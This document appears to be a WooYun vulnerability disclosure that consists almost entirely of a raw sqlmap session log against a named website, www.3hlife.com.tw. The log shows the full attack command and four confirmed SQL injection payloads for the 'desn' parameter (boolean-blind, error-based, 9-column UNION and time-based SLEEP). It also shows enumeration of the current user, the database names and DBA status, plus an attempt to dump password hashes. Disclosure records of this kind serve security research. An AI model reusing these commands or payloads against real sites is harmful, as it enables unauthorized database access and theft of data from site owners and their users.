WooYun.org

[root@Hacker~]# Sqlmap sqlmap.py -u "http://www.3hlife.com.tw/manage_show.php?desn=15" --dbs --passwords --current-user --current-db --is-dba
    sqlmap/1.0-dev - automatic SQL injection and database takeover tool
    http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state
[*] starting at 22:50:59
[22:51:00] [INFO] testing connection to the target URL
[22:51:01] [INFO] testing if the target URL is stable. This can take a couple of seconds
[22:51:03] [INFO] target URL is stable
[22:51:03] [INFO] testing if GET parameter 'desn' is dynamic
[22:51:03] [INFO] confirming that GET parameter 'desn' is dynamic
[22:51:04] [INFO] GET parameter 'desn' is dynamic
[22:51:07] [INFO] heuristic (basic) test shows that GET parameter 'desn' might be injectable (possible DBMS: 'MySQL')
[22:51:07] [INFO] testing for SQL injection on GET parameter 'desn'
heuristic (parsing) test showed that the back-end DBMS could be 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
do you want to include all tests for 'MySQL' extending provided level (1) and risk (1)? [Y/n]
[22:51:09] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[22:51:10] [WARNING] reflective value(s) found and filtering out
[22:51:12] [INFO] GET parameter 'desn' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
[22:51:12] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[22:51:12] [INFO] GET parameter 'desn' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
[22:51:12] [INFO] testing 'MySQL inline queries'
[22:51:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[22:51:14] [WARNING] time-based comparison needs larger statistical model. Making a few dummy requests, please wait..
[22:51:20] [CRITICAL] there is considerable lagging in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[22:51:20] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[22:51:20] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[22:52:10] [INFO] GET parameter 'desn' is 'MySQL > 5.0.11 AND time-based blind' injectable
[22:52:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[22:52:10] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[22:52:12] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for
[22:52:14] [INFO] target URL appears to have 9 columns in query
[22:52:37] [INFO] GET parameter 'desn' is 'MySQL UNION query (NULL) - 1 to 20 columns' injectable
[22:52:39] [WARNING] automatically patching output having last char trimmed
GET parameter 'desn' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection points with a total of 28 HTTP(s) requests:
---
Place: GET
Parameter: desn
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: desn=15 AND 4977=4977
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: desn=15 AND (SELECT 3559 FROM(SELECT COUNT(*),CONCAT(0x71676e6471,(SELECT (CASE WHEN (3559=3559) THEN 1 ELSE 0 END)),0x716b756a71,FLOOR(RAND(0)*2))x FROM INFOR
    Type: UNION query
    Title: MySQL UNION query (NULL) - 9 columns
    Payload: desn=15 UNION ALL SELECT NULL,NULL,CONCAT(0x71676e6471,0x636646596f6c48594b75,0x716b756a71),NULL,NULL,NULL,NULL,NULL,NULL#
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: desn=15 AND SLEEP(5)
---
[22:53:02] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5.0
[22:53:02] [INFO] fetching current user
current user:    'hlife3@%'
[22:53:03] [INFO] fetching current database
current database:    'hlife3'
[22:53:04] [INFO] testing if current user is DBA
[22:53:04] [INFO] fetching current user
[22:53:05] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA:    False
[22:53:05] [INFO] fetching database users password hashes
[22:53:08] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION tech
[22:53:08] [WARNING] the SQL query provided does not return any output
[22:53:14] [WARNING] the SQL query provided does not return any output
[22:53:14] [INFO] fetching database users
[22:53:15] [INFO] fetching number of password hashes for user 'hlife3'
[22:53:15] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[22:53:15] [INFO] retrieved:
[22:53:19] [INFO] retrieved:
[22:53:19] [WARNING] it is very important not to stress the network adapter's bandwidth during usage of time-based payloads
[22:53:25] [WARNING] unable to retrieve the number of password hashes for user 'hlife3'
[22:53:25] [ERROR] unable to retrieve the password hashes for the database users (most probably because the session user has no read privileges over the relevant system dat
[22:53:25] [INFO] fetching database names
available databases [2]:
[*] hlife3
[*] information_schema
[22:53:26] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in
[22:53:26] [INFO] fetched data logged to text files under 'C:\Users\ADMINI~1\Desktop\???~1\???~1\SQLMAP~1.4\Bin\output\www.3hlife.com.tw'